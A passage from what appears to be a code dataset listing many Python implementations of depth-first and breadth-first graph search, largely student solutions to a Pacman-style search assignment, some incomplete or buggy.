parents\n parents[substate[0]]={'parent':state} \n # generate new node\n waiting_list.push(substate)\n # push to stack\n if problem.isGoalState(substate[0]): \n target_state = substate \n #finding wayback\n\n\n while target_state[0] in parents.keys():\n temp=parents[target_state[0]]['parent']\n sequence.append(target_state[1])\n target_state = temp\n sequence.append(target_state[1])\n return sequence[::-1]", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n # util.raiseNotDefined()\n\n # print(\"Start:\", problem.getStartState())\n # print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n # print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n\n # Initialize a frontier, and push the initial state into the frontier\n frontier = util.Stack()\n frontier.push([(problem.getStartState(), 'move', 0)])\n # Initialize a explored set to store the visited nodes\n exploredSet = set()\n\n # Check the content of frontier\n while not frontier.isEmpty():\n stateList = list()\n stateList = frontier.pop()\n # print (stateList)\n # What we focus on is the next state, not the (previous state + next state), so we should take the last element\n nextState = stateList[len(stateList) - 1]\n # Check the current state is goal or not\n if problem.isGoalState(nextState[0]):\n # Initial a path, which is the way to the goal state\n path = list()\n for eachMove in stateList:\n path.append(eachMove[1])\n # If the initial state is the goal state, there's no need to explore other nodes, so that's called special condition\n if len(path) == 1:\n return path[0]\n # This is the normal condition, we should convey the path except the first one, because we haven't define what's \"move\"\n else:\n return path[1:]\n # If this is a state which we don't visit, add it to the explored set(this is called GSA)\n if not nextState[0] in exploredSet:\n exploredSet.add(nextState[0])\n # Give me your child nodes\n for childState in problem.getSuccessors(nextState[0]):\n nextStateList = stateList[:]\n # we focus on the path, so we have to record the every move from the initial state to the current one\n nextStateList.append(childState)\n frontier.push(nextStateList)\n\n # Or maybe there's no way to the goal state\n else:\n return \"There's no way.\"", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n visited_nodes = []\n start_node = problem.getStartState()\n visited_nodes.append(start_node)\n curr_node = start_node\n q = util.Queue()\n directions = util.Queue()\n q.push(curr_node)\n goal_found = problem.isGoalState(curr_node)\n\n while not goal_found:\n nxt_node_list = problem.getSuccessors(curr_node)\n nxt_node_found = False\n\n # Check if a child can be found which has not been visited\n for node in nxt_node_list:\n nxt_node = node[0]\n move = node[1]\n if nxt_node not in visited_nodes:\n nxt_node_found = True # mark that a child node has been found\n q.push(nxt_node) # add the node in the tree\n directions.push(move) # add the direction\n visited_nodes.append(nxt_node) # mark the node as visited\n break\n\n # If child not found, go to parent\n if not nxt_node_found:\n q.list.pop(0)\n directions.list.pop(0)\n\n if q.isEmpty(): break\n\n curr_node = q.list[0]\n goal_found = problem.isGoalState(curr_node)\n\n final_moves = []\n while not directions.isEmpty():\n final_moves.append(directions.pop())\n \n return final_moves\n #util.raiseNotDefined()", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n from util import Stack\n Pilha_Caminho = Stack()\n Pilha_Estados = Stack()\n Caminho = []\n Visitados = []\n\n Pilha_Caminho.push(Caminho) # empilha caminho (vazio, no começo)\n Pilha_Estados.push(problem.getStartState()) # empilha estado inicial\n\n while (Pilha_Caminho.isEmpty() == False and Pilha_Estados.isEmpty() == False):\n Caminho_Andado = Pilha_Caminho.pop() # atualiza caminho\n Estado_Atual = Pilha_Estados.pop() # atualiza estado\n if problem.isGoalState(Estado_Atual): # caso estado atual seja o desejado,\n return Caminho_Andado # retorna o caminho total\n if Estado_Atual not in Visitados: # caso estado atual não tenha sido visitado\n Visitados.append(Estado_Atual) # marca estado como visitado\n for Sucessor in problem.getSuccessors(Estado_Atual): # busca sucessores\n if Sucessor[0] not in Visitados: # caso sucessor não tenha sido visitado\n Pilha_Caminho.push(Caminho_Andado + [Sucessor[1]]) # atualiza caminho total na pilha\n Pilha_Estados.push(Sucessor[0]) # atualiza estado\n return", "def dft_recursive(self, starting_vertex, visited=None):\n if visited is None: # if visited is None\n visited = set() # create an empty 'set' to store visisted vertex, set sorts \n\n if starting_vertex not in visited: # if starting_vertex has not been visited yet\n print(starting_vertex)\n visited.add(starting_vertex) # add to the set \n\n for neighbor in self.vertices[starting_vertex]: # loop through each neighbor \n self.dft_recursive(neighbor, visited) # call the dft_recursive method on each neighbor ", "def search(G):\n visited = set()\n\n for v in range(len(G)):\n if v not in visited:\n yield v, v, forward\n visited.add(v)\n stack = [(v, iter(G[v]))]\n while stack:\n parent, children = stack[-1]\n try:\n child = next(children)\n if child in visited:\n yield parent, child, nontree\n else:\n yield parent, child, forward\n visited.add(child)\n stack.append((child, iter(G[child])))\n except StopIteration:\n stack.pop()\n if stack:\n yield stack[-1][0], parent, reverse\n yield v, v, reverse", "def dfs(start_node, goal_state, limit = None, iterative = False, graphSearch = False, improved_descendants = False):\t\n\tfringe = [start_node]\n\tnumber_nodes_expanded = 0\n\tnumber_nodes_visited = 0\n\n\tt0 = time.time()\n\n\tif graphSearch:\n\t\tclosed = {} #hash_map\n\n\twhile len(fringe) > 0:\n\t\tnumber_nodes_visited += 1\n\t\tnode = fringe.pop()\n\t\tnode.count = number_nodes_visited\n\n\t\tt1 = time.time()\n\t\tif (t1 - t0) > 900:\n\t\t\tprint(\"It took more than 15 min\")\n\t\t\tif iterative:\n\t\t\t\treturn False\n\t\t\telse:\n\t\t\t\treturn False\n\t\t\n\t\tif node.check_solution(goal_state):\n\t\t\t_ = print_solution(node, number_nodes_expanded, goal_state)\n\t\t\tif iterative:\n\t\t\t\treturn True, number_nodes_visited\n\t\t\tprint(\"Expanded nodes: \" + str(number_nodes_expanded))\n\t\t\treturn True \n\n\n\t\tif limit == None or node.depth < limit:\n\t\t\tif graphSearch:\n\t\t\t\tnode_hash = node.build_hash()\n\t\t\t\tnode_depth = node.depth\n\t\t\t\t#can also add if it's found i at smaller depth. Grants solution every time\n\t\t\t\tif node_hash not in closed or closed[node_hash] > node_depth:\n\t\t\t\t\tclosed[node_hash] = node_depth\n\t\t\t\t\tnumber_nodes_expanded += 1\n\t\t\t\t\tchild_nodes = node.successors(improved_descendants)\n\t\t\t\t\tfor i in range(len(child_nodes)):\n\t\t\t\t\t\tfringe.append(child_nodes[i])\n\t\t\telse:\n\t\t\t\tnumber_nodes_expanded += 1\n\t\t\t\tchild_nodes = node.successors(improved_descendants)\n\t\t\t\tfor i in range(len(child_nodes)):\n\t\t\t\t\tfringe.append(child_nodes[i])\n\t\n\tif iterative:\n\t\treturn False, number_nodes_visited\n\t\t\t\n\treturn False", "def sudokuDepthFirstSearch(problem):\n\n def convertStateToHash(values):\n \"\"\" \n values as a dictionary is not hashable and hence cannot be used directly in the explored/visited set.\n This function changes values dict into a unique hashable string which can be used in the explored set.\n You may or may not use this\n \"\"\"\n l = list(sorted(values.items()))\n modl = [a+b for (a, b) in l]\n return ''.join(modl)\n\n ## YOUR CODE HERE\n root_node = Node(problem.getStartState(), [], 0, None, 0)\n frontier = util.Stack()\n frontier.push(root_node)\n explored = []\n\n while not(frontier.isEmpty()):\n node_to_explore = frontier.pop()\n\n if problem.isGoalState(node_to_explore.state):\n return node_to_explore.state\n else:\n copy_state = node_to_explore.state.copy()\n \n if convertStateToHash(copy_state) not in explored:\n\t explored.append(convertStateToHash(copy_state))\n\t successors_state = problem.getSuccessors(copy_state)\n\t if len(successors_state) > 0:\n\t\t for state_action_cost in successors_state:\n\t\t if convertStateToHash(state_action_cost[0]) in explored:\n\t\t continue\n\t\t else:\n\t\t frontier.push(Node(state_action_cost[0], state_action_cost[1], node_to_explore.path_cost + 1, node_to_explore, node_to_explore.depth + 1))\n\n return False\n # util.raiseNotDefined()", "def depthFirstSearch(problem):\n\n explored = set()\n frontier = []\n start_state = problem.getStartState()\n frontier.append(start_state)\n parent_hash = {}\n parent_hash[start_state] = (None, None)\n\n def get_path(state):\n path_stack = util.Stack()\n actions = []\n current = state\n while parent_hash[current][0] is not None:\n path_stack.push(parent_hash[current][0])\n current = parent_hash[current][1]\n while not path_stack.isEmpty():\n actions.append(path_stack.pop())\n\n return actions\n\n while len(frontier):\n node = frontier.pop()\n if problem.isGoalState(node):\n return get_path(node)\n explored.add(node)\n for state, action, _ in problem.getSuccessors(node):\n if state not in explored and state not in frontier:\n parent_hash[state] = (action, node)\n frontier.append(state)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n from util import Stack\n\n frontier = Stack()\n explored = []\n actions = []\n\n class node:\n def __init__(self, path, dad, action):\n self.path = path\n self.dad = dad\n self.action = action\n\n start = node(problem.getStartState(),'','')\n frontier.push(start)\n\n while frontier.isEmpty() == False:\n path = frontier.pop()\n successors = problem.getSuccessors(path.path)\n explored.append(path)\n for vertex in successors:\n achou = False\n for path_ex in explored:\n if vertex[0] == path_ex.path:\n achou = True\n if achou == False:\n successor = node(vertex[0],path.path,vertex[1])\n frontier.push(successor)\n if problem.isGoalState(successor.path):\n while len(explored) > 0:\n ant = explored.pop()\n if ant.path == successor.dad:\n actions.append(successor.action)\n successor = ant\n actions.reverse()\n return actions", "def depth_first_search(problem):\n fringe = util.Stack()\n return general_search(problem, fringe)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n stack = util.Stack() # stack for searshing the graph\n visited = [] # Keep track of visited nodes\n start =problem.getStartState() # The start node\n stack.push((start, [])) # the sart state and empty path list is pushed to the stack\n \n while stack:\n (vrtx, path) = stack.pop() # Pop tfrom the stack , vrtx: the poped node for expantion.\n if vrtx not in visited: # if the node is visited alraedy \n if problem.isGoalState(vrtx):\n return [p[1] for p in path]\n visited.append(vrtx)\n for successor in problem.getSuccessors(vrtx):\n stack.push((successor[0], path+[successor]))\n util.raiseNotDefined()", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n fringeList = util.Stack()\n print \"fringeList\",fringeList\n closedList = {str(problem.getStartState()): ([])} #Hash Map to maintain state to path\n print \"closed list:\", closedList\n isGoalStateArrived = False\n\n # Push start state into fringeList\n fringeList.push((problem.getStartState()))\n\n while not isGoalStateArrived and not fringeList.isEmpty():\n currentNode = fringeList.pop()\n print \"currentNode\",currentNode\n currentNodePath = closedList[str(currentNode)]\n print \"currentNodepath:\",currentNodePath\n # Explore children\n childrenOfCurrentNode = problem.getSuccessors(currentNode)\n print \"childrenOfCurrentNode:\",childrenOfCurrentNode\n for childNode in childrenOfCurrentNode:\n if str(childNode[0]) not in closedList:\n path = copy.copy(currentNodePath)\n path.append(childNode[1])\n print \"child [0] %s, child [1] %s\", childNode[0],childNode[1]\n print \"path \", path\n fringeList.push(childNode[0])\n closedList[str(childNode[0])] = path # Put parent node in closed List\n if problem.isGoalState(childNode[0]):\n isGoalStateArrived = True\n goalState = childNode[0]\n break\n\n if isGoalStateArrived:\n #print closedList[str(problem.getStartState())]\n return closedList[str(goalState)]\n \"util.raiseNotDefined()\"", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n class Node:\n def __init__(self, state, parent, action, pathCost):\n self.state = state #state of the game\n self.parent = parent #parent of the node\n self.action = action #action that led to that node\n self.pathCost = pathCost #total cost of tha path until that node\n\n def solution(self): #return the path to the goal node\n path = [] #path is a list of actions\n tempNode = self #temp node is the goal node\n while tempNode.state != problem.getStartState(): #until we get to the initial node\n path.insert(0, tempNode.action) #insert at the start of the list\n tempNode = tempNode.parent #go to the parent of the node\n return path #return list of actions\n\n def childNode(successor, parent, action, stepCost):\n pathCost = parent.pathCost + stepCost #total cost is the total cost of the parent + the cost of the last action\n child = Node(successor, parent, action, pathCost) #create new child node\n return child\n\n initialNode = Node(problem.getStartState(), None, None, 0) #create initial node with start state and no parent\n if problem.isGoalState(initialNode.state):\n return initialNode.solution()\n\n frontier = util.Stack() #dfs uses a stack\n frontier.push(initialNode) #insert initial node to the stack\n explored = set() #explored nodes are added to a set\n\n while not frontier.isEmpty(): #while stack is not empty\n nextNode = frontier.pop() #extract the last node entered\n explored.add(nextNode.state) #add the state of the node to the explored set\n for successor, action, stepCost in problem.getSuccessors(nextNode.state): #for every successor create a new child\n child = childNode(successor, nextNode, action, stepCost)\n if child.state not in explored and child not in frontier.list: #if child is not already explored or is not in the stack\n if problem.isGoalState(child.state): # if node is goal node we return the path of actions\n return child.solution()\n frontier.push(child) #insert it into the stack\n\n return [] #if stack is empty\n util.raiseNotDefined()", "def graph_search(problem, verbose=False, debug=False):\r\n \r\n # PriorityQueue should be used to maintain the order of the queue.\r\n frontier = PriorityQueue()\r\n \r\n frontier.append(Node(problem, problem.initial))\r\n \r\n current_node = frontier.pop()\r\n \r\n p = True\r\n #depth first search\r\n if current_node.expand(current_node.problem)[0].g < 0:\r\n \r\n frontier = deque()\r\n frontier.append(Node(problem, problem.initial))\r\n #breadth first search\r\n elif current_node.expand(current_node.problem)[0].h < 2:\r\n \r\n p = False\r\n frontier = deque()\r\n frontier.append(Node(problem, problem.initial))\r\n #manhattan\r\n else:\r\n \r\n frontier.append(current_node)\r\n\r\n f_hash = Explored()\r\n f_hash.add(problem.initial.state_tuple())\r\n done = False\r\n n_explored = 0\r\n explored = Explored()\r\n\r\n #graph_search\r\n while not done:\r\n \r\n if p:\r\n current_node = frontier.pop()\r\n else:\r\n current_node = frontier.popleft()\r\n explored.add(current_node.state.state_tuple())\r\n n_explored = n_explored + 1 #inc the number of explored nodes\r\n\r\n if current_node.state.solved():\r\n path = current_node.path()\r\n done = True\r\n return path, n_explored\r\n #if not found in the tree return none and number of nodes explored\r\n else:\r\n \r\n for child in current_node.expand(current_node.problem):\r\n if not explored.exists(child.state.state_tuple()) and not \\\r\n f_hash.exists(child.state.state_tuple()):\r\n frontier.append(child)\r\n f_hash.add(child)\r\n done = len(frontier) == 0\r\n\r\n return None, n_explored", "def _dfsearch_recursive(self, footprint):\n self.visited[footprint] = 1\n self.temp_component.append(footprint)\n for neighbour in self.neighbours[footprint]:\n if self.visited[neighbour] == 0:\n self._dfsearch(neighbour)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n #util.Stack() = LIFO for DFS\n #travel down path until end of line unlike BFS, backtrack until there is another path\n\n visited = []\n\n frontier = util.Stack()\n frontier.push( (problem.getStartState(), []) ) \n\n while not frontier.isEmpty():\n node,actions = frontier.pop()\n\n if problem.isGoalState(node):\n return actions\n\n visited.append(node)\n\n for coord,direction,cost in problem.getSuccessors(node):\n if not coord in visited:\n frontier.push((coord, actions + [direction]))\n\n return []", "def bfs_visited(ugraph, start_node):\r\n queue = deque()\r\n visited = set() #Set is enough here.\r\n visited.add(start_node)\r\n queue.append(start_node)\r\n while len(queue) != 0:\r\n temp_node = queue.popleft()\r\n for neighbor in ugraph[temp_node]: #In graph theory, neighborhood is \r\n if neighbor not in visited: #well defined, so could be used directely.\r\n visited.add(neighbor)\r\n queue.append(neighbor)\r\n return visited", "def bfs(G, start, finish):\n if start == finish:\n return 0 # edge case - going to myself is 0\n marked = set()\n queue = deque()\n marked.add(start)\n queue.append((start, 0))\n while queue:\n cur, cur_depth = queue.popleft()\n children = G[cur]\n for child in children:\n if child == finish:\n return cur_depth + 1\n elif child not in marked:\n marked.add(child)\n queue.append((child, cur_depth + 1))\n return -1 # exhausted the whole queue and no path", "def dft_recursive(self, starting_vertex, visited = None):\n \"\"\"\n Check if Vertex is in visited\n if NOT visited, add to visited set\n Call dft_recursive on every neighbor \n \n\n \"\"\"\n # 1) base case >> where to stop recursion\n # 2) calls itself from within\n # 3) each iteration approaches base case\n\n # 1) base case >> where to stop recursion\n\n # init a set that persists after recursions loops to save visited\n if visited == None:\n visited = set()\n\n if starting_vertex not in visited: # 1) & 3) Check if vertex has NOT been visited\n visited.add(starting_vertex) # if True, add to visited set\n\n print(starting_vertex)\n\n # perform recursion on neighbor\n for n in self.get_neighbors(starting_vertex):\n self.dft_recursive(n, visited) # 2) ", "def bfs_w_depth(tree):\n visited = []\n frontier = [(0, tree)]\n while frontier:\n depth, tree = frontier.pop(0)\n if tree is not None:\n visited.append((depth, tree[0]))\n frontier.append((depth + 1, tree[1]))\n frontier.append((depth + 1, tree[2]))\n return visited", "def depthFirstSearch(problem):\n \n from game import Directions\n North = Directions.NORTH\n South = Directions.SOUTH\n East = Directions.EAST\n West = Directions.WEST \n \n pathDict = {}\n visited = set()\n #visited start\n visited.add(problem.getStartState())\n #initial successors\n successor = problem.getSuccessors(problem.getStartState())\n for initSucc in successor:\n pathDict[initSucc[0]] = [initSucc[1]]\n #loop\n while (1):\n #if fringe = null, return failure\n if (len(successor) == 0):\n print \"Fringe is empty\"\n return util.raiseNotDefined()\n #(v, path) = fringe.pop\n succLocation = successor[0][0]\n succDirection = successor[0][1]\n del successor[0]\n #if isGoal = true, return path\n if problem.isGoalState(succLocation):\n return pathDict[succLocation]\n #if visited = false\n if succLocation not in visited:\n #visited = true\n visited.add(succLocation)\n #L = expand(v,path)\n tempSuccList = problem.getSuccessors(succLocation)\n #Fringe <- L\n for succ in reversed(tempSuccList):\n successor.insert(0,succ)\n pathDict[succ[0]] = []\n pathDict[succ[0]].extend(pathDict[succLocation])\n pathDict[succ[0]].append(succ[1])", "def breadth_first_traversal(self, start):\n visited = []\n visited.append(start)\n start_visited = visited\n while True:\n temp = []\n for node_ in start_visited:\n for i in self.neighbors(node_):\n if i not in visited:\n visited.append(i)\n temp.append(i)\n start_visited = temp\n if not temp:\n break\n return visited", "def general_search(fringe, visited, limiting_depth):\n node_to_be_explored = fringe[0]\n node_state = node_to_be_explored['state']\n visited[node_state] = node_to_be_explored\n if goal_test(node_to_be_explored['state']):\n return generate_path(node_to_be_explored, visited)\n current_depth = node_to_be_explored['depth']\n if current_depth == limiting_depth:\n return False\n children = [\n {\n 'state': child_state,\n 'parent': node_state,\n 'depth': current_depth + 1,\n }\n for child_state in operator(node_state)]\n for child in children:\n if child['state'] in visited:\n continue\n fringe_copy = [child] + fringe[1:]\n visited_copy = visited.copy()\n solution = general_search(fringe_copy, visited_copy, limiting_depth)\n if solution:\n return solution\n else:\n continue\n return False", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n\n # current path stack\n path_stack = util.Stack()\n action_stack = util.Stack()\n path_stack.push(problem.getStartState())\n\n # visited (so don't )\n visited = []\n visited.append(problem.getStartState())\n\n i = 0\n while not path_stack.isEmpty():\n\n # check goal state\n if problem.isGoalState(path_stack.list[-1]): # check if goal\n return action_stack.list\n\n # get next possible state (choose first in list)\n successors = problem.getSuccessors(path_stack.list[-1])\n forward=False\n for successor in successors:\n ss,aa,_ = successor\n if ss not in visited:\n\n path_stack.push(ss)\n action_stack.push(aa)\n visited.append(ss) # you don't pop visited\n forward=True\n break\n\n # backtrack\n if forward==False:\n path_stack.pop()\n action_stack.pop()\n\n i+=1\n #if i==25:\n # import pdb; pdb.set_trace()\n #print(path_stack.list)", "def bfs_visited(ugraph, start_node):\n \n visited = set([start_node])\n cola = deque([start_node])\n \n while len(cola)>0:\n node = cola.popleft() \n for neigh in ugraph[node]:\n if not neigh in visited:\n visited.add(neigh)\n cola.append(neigh)\n \n return visited", "def DFSUtility(obj,vertex,visited,subGraph):\n visited[vertex] = True\n subGraph.append(vertex)\n for nxtVertex in obj.adjList[vertex]:\n if visited[nxtVertex]:\n continue\n DFSUtility(obj,nxtVertex,visited,subGraph)", "def dft_recursive(self, starting_vertex, visited=None):\n if visited is None:\n visited = set()\n visited.add(starting_vertex)\n print(starting_vertex)\n for neighb_vert in self.vertices[starting_vertex]:\n if neighb_vert not in visited:\n self.dft_recursive(neighb_vert, visited)", "def dfs(adj, used, order, x):\n # write your code here\n # Mark as visited\n used[x] = 1\n for v in adj[x]:\n if not used[v]:\n # If not visited, run dfs\n dfs(adj, used, order, v)\n # When no more recursion, add to the order list\n order.append(x)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE IF YOU WANT TO PRACTICE ***\"\n # Initialize a stack\n open = util.Stack()\n\n # Retrieve the init state\n initState = (problem.getStartState(), ['Stop'], 0)\n open.push(initState)\n closed = []\n\n while not open.isEmpty():\n currState = open.pop()\n currPos = currState[0]\n currPath = currState[1]\n currCost = currState[2]\n\n if problem.isGoalState(currPos):\n return currPath[1:]\n else:\n closed.append(currPos)\n if currState not in closed:\n successors = problem.getSuccessors(currPos)\n if len(successors) > 0:\n for each in successors:\n if each[0] not in closed:\n temp = (each[0], currPath+[each[1]], currCost+each[2])\n open.push(temp)\n return False", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n util.raiseNotDefined()", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n mystack = util.Stack()\n startNode = (problem.getStartState(), '', 0, [])\n mystack.push(startNode)\n visited = set()\n while mystack :\n node = mystack.pop()\n state, action, cost, path = node\n if state not in visited :\n visited.add(state)\n if problem.isGoalState(state) :\n path = path + [(state, action)]\n break;\n succNodes = problem.expand(state)\n for succNode in succNodes :\n succState, succAction, succCost = succNode\n newNode = (succState, succAction, cost + succCost, path + [(state, action)])\n mystack.push(newNode)\n actions = [action[1] for action in path]\n del actions[0]\n return actions", "def bfs_visited(ugraph, start_node):\n visited = set([start_node])\n queue = deque([start_node])\n while queue:\n node = queue.popleft()\n for neighbor in ugraph[node]:\n if neighbor not in visited:\n visited.add(neighbor)\n queue.append(neighbor)\n return visited", "def graph_search(problem, fringe):\n counter = 0\n closed = {}\n fringe.append(Node(problem.initial))\n max_depth=0\n while fringe:\n node = fringe.pop()\n # Print some information about search progress\n if node.depth>max_depth:\n max_depth=node.depth\n if max_depth<50 or max_depth % 1000 == 0:\n pid = os.getpid()\n py = psutil.Process(pid)\n memoryUse = py.memory_info()[0]/1024/1024\n print('Reached depth',max_depth,\n 'Open len', len(fringe),\n 'Node expanse', counter,\n 'Memory used (MBytes)', memoryUse)\n\n if problem.goal_test(node.state):\n return node, counter\n serial = node.state.__str__()\n if serial not in closed:\n counter += 1\n closed[serial] = True\n fringe.extend(node.expand(problem))\n return None", "def depth_first_traversal_iterative(self, start):\n try:\n res = []\n stack = Stack([start])\n track = set()\n while stack.top:\n cur_node = stack.pop()\n if cur_node not in track:\n res.append(cur_node)\n track.add(cur_node)\n for child in reversed(self.node_dict[cur_node]):\n stack.push(child)\n except KeyError:\n raise KeyError(str(start) + ' not in graph')\n return res", "def in_order_traverse(root):\n stack = deque([root])\n visited = set()\n while stack:\n node = stack.pop()\n if node is None:\n continue\n if node.index in visited:\n print(node.index, end=' ')\n continue\n visited.add(node.index)\n stack.append(node.right)\n stack.append(node)\n stack.append(node.left)", "def bfs_iterative(graph,start):\n\tvisited = set()\n\twatched = set()\n\tnodes_queue = [start] # List that helps as queue\n\twatched.add(start)\n\t\n\twhile nodes_queue:\n\t\tcurrent_node = nodes_queue.pop(0)\n\n\t\tprint(\"visiting\",current_node)\n\t\tvisited.add(current_node)\n\t\t\n\t\tfor adjacent_node in graph[current_node]:\n\t\t\tif (adjacent_node not in watched) and (adjacent_node not in visited):\n\t\t\t\tnodes_queue.append(adjacent_node)\n\t\t\t\t#path.add(adjacent_node)", "def dft(self, starting_vertex):\n \"\"\" LIFO\n Create a stack \n Push starting Vertex\n Create a set to store visited\n While the stack is NOT empty: e.g. > 0\n Pop the last added Vertex\n Check IF NOT visited:\n Mark as visited\n\n\n Push ALL of neighbors\n \"\"\"\n s = Stack() # Create a stack\n s.push(starting_vertex) # Push starting Vertex\n visited = set() # Create a set to store visited\n\n while s.size() > 0: # While the stack is NOT empty: e.g. > 0\n v = s.pop() # Pop the last added Vertex\n\n if v not in visited: # Check IF NOT visited: e.g. > 0\n print(v)\n visited.add(v) # Mark as visited\n\n for n in self.get_neighbors(v): # Check IF NOT visited:\n s.push(n) # Push ALL of neighbors ", "def dft_recursive(self, starting_vertex):\n \n visited = []\n\n def helper(vert, visited):\n visited.append(vert)\n print(vert)\n\n for child in self.vertices[vert]:\n if child not in visited:\n helper(child, visited)\n\n helper(starting_vertex, visited)", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n\n # Frontier stored in a Stack\n frontier = util.Stack()\n\n # Visited states stored in a list\n visitedStates = []\n\n # Format of each element: (current coordinates, [path taken to get there]) \n frontier.push((problem.getStartState(), []))\n\n # while there are still states to explore\n while not frontier.isEmpty():\n \n # store the current state and path in separate variables\n currentState, pathTaken = frontier.pop()\n\n # for skipping states that have already been visited\n if currentState in visitedStates:\n continue\n\n # for returning the correct path to the goal state upon discovering it\n if problem.isGoalState(currentState):\n return pathTaken\n\n # count the current state as \"visited\"\n visitedStates.append(currentState)\n\n # for each successor state, check whether they have already been visited. if not, add their coordinates to the frontier, and append their respective direction to the path list\n for coordinates, direction, cost in problem.getSuccessors(currentState):\n\n if coordinates not in visitedStates:\n \n frontier.push((coordinates, pathTaken + [direction]))\n\n\n util.raiseNotDefined()", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n \n util.raiseNotDefined()", "def search_loop(graph):\n visited = set()\n for vertex in graph:\n if vertex not in visited:\n if dfs(vertex, graph, visited, -1):\n return True\n return False", "def depthFirstSearch(problem):\n #Initializing variables\n fringe = util.Stack()\n #Creating visited list\n visited = []\n #Pushing start state to Stack\n fringe.push((problem.getStartState(), []))\n #Adding start state to visited list\n visited.append(problem.getStartState())\n \n #Popping point from the stack\n while fringe.isEmpty() == False:\n state, actions = fringe.pop()\n #Getting successor nodes\n for next in problem.getSuccessors(state):\n newstate = next[0]\n newdirection = next[1]\n #Pushing successor nodes to the stack and appending to visited\n if newstate not in visited:\n if problem.isGoalState(newstate):\n return actions + [newdirection] \n else:\n fringe.push((newstate, actions + [newdirection]))\n visited.append(newstate)\n\n util.raiseNotDefined()", "def depthFirstSearch(problem):\n \"*** YOUR CODE HERE ***\"\n # initialize frontier using initial state of problem\n current_state = problem.getStartState()\n frontier = util.Stack()\n frontier.push(current_state)\n\n # initialize explored set to be empty\n explored_set = []\n\n # a dictionary to save how to get to certain states from initial state\n actions_list = {current_state:[]}\n\n # loop while we still have unexplored nodes\n while not frontier.isEmpty():\n\n # choose a leaf node and remove it from frontier\n leaf_node = frontier.pop()\n\n # return the solution if it is the goal state\n if problem.isGoalState(leaf_node):\n return actions_list[leaf_node]\n\n # add the node to explored set\n explored_set.append(leaf_node)\n\n # expand the chosen node\n # and add to the frontier if not in frontier and explored set\n for successor in problem.getSuccessors(leaf_node):\n child, action, _ = successor\n if child not in explored_set and child not in frontier.list:\n frontier.push(child)\n actions_list[child] = actions_list[leaf_node] + [action]\n else:\n # search through all but still can't find a solution -> failed!\n return 'failure'", "def depth_first_search(self):\r\n queue = [self.root]\r\n ordered = []\r\n while queue:\r\n node = queue.pop()\r\n ordered.append(node)\r\n queue.extend(node.children)\r\n \r\n while ordered:\r\n yield ordered.pop()", "def find_DFS(self, value):\n \n to_visit = [self]\n \n while to_visit:\n curr = to_visit.pop() # DFS -> .pop() from end -> stack\n \n if curr.value == value:\n return curr\n \n to_visit.extend(curr.children)", "def dft_recursive(self, starting_vertex, cache = None):\n \"\"\"\n If this is the first repetition create a cache set. If the \n current vertex is not in the cache add it and print the \n vertex. For every edge the vertex has run another repetition.\n \"\"\"\n if not cache:\n cache = set()\n if starting_vertex not in cache:\n cache.add(starting_vertex)\n print(starting_vertex)\n for edge in self.get_neighbors(starting_vertex):\n if edge not in cache:\n self.dft_recursive(edge, cache)", "def dfs(visited: list, graph: AdjList, node: int):\n if node not in visited:\n visited.append(node)\n for neighbour in graph[node]:\n dfs(visited, graph, neighbour)", "def sudokuDepthFirstSearch(problem):\n\n def convertStateToHash(values):\n \"\"\" \n values as a dictionary is not hashable and hence cannot be used directly in the explored/visited set.\n This function changes values dict into a unique hashable string which can be used in the explored set.\n You may or may not use this\n \"\"\"\n l = list(sorted(values.items()))\n modl = [a+b for (a, b) in l]\n return ''.join(modl)\n\n # YOUR CODE HERE\n frontier = util.Stack()\n explored = set()\n initialState = problem.getStartState()\n frontier.push(initialState)\n while not frontier.isEmpty():\n choice = frontier.pop()\n if convertStateToHash(choice) not in explored:\n if problem.isGoalState(choice):\n return choice\n successors = problem.getSuccessors(choice)\n for successor in successors:\n frontier.push(successor[0])\n explored.add(convertStateToHash(choice))\n # util.raiseNotDefined()", "def depth_first_traversal(self, start):\n return self.recursive_dft(start, [])", "def depthFirstSearch(problem):\n marcado = set()\n pilha = util.Stack()\n pilha.push((problem.getStartState(), []))\n while not pilha.isEmpty():\n posicao, movimento = pilha.pop()\n if problem.isGoalState(posicao):\n return movimento\n if posicao in marcado:\n continue\n marcado.add(posicao)\n candidatos = problem.getSuccessors(posicao)\n for candidato, acao, custo in candidatos:\n pilha.push((candidato, movimento + [acao]))\n return []", "def dfs(self, start_node, cbfunc):\n visited = set()\n stack = [start_node]\n\n while len(stack) != 0:\n node = stack.pop()\n if node in visited:\n continue\n cbfunc(node)\n visited.add(node)\n for neighbor_node in node.each_neighbor():\n stack.append(neighbor_node)", "def depthFirstSearch(problem):\n\n\n \"*** YOUR CODE HERE ***\"\n st = util.Stack()\n strt = problem.getStartState()\n st.push(strt) \n visited = []\n came_from ={}\n came_from [strt] =(None,None)\n\n while not st.isEmpty():\n state = st.pop()\n if state in visited :\n continue\n visited.append(state)\n if problem.isGoalState(state) :\n break\n nodes = problem.getSuccessors(state)\n for (successor,action,cost) in nodes:\n if successor not in visited :\n st.push(successor)\n came_from[successor] = (state , action) \n \n # exit while\n actions = []\n while(state != strt) :\n (parent,action) =came_from[state]\n state = parent\n actions.append(action)\n actions.reverse()\n return actions", "def dfs(graph, root, method='dfs', max_depth=10000):\n \n # Get node object from node ID\n root = graph.getnodes(root)\n \n # Define the search method\n stack_pop = -1\n if method == 'bfs':\n stack_pop = 0\n \n visited = []\n stack = [root.nid]\n depth = 0\n \n while stack or depth == max_depth:\n node = stack.pop(stack_pop)\n \n if node not in visited:\n visited.append(node)\n stack.extend(\n [x for x in node_neighbors(graph, node) if x not in visited])\n depth += 1\n \n return visited", "def 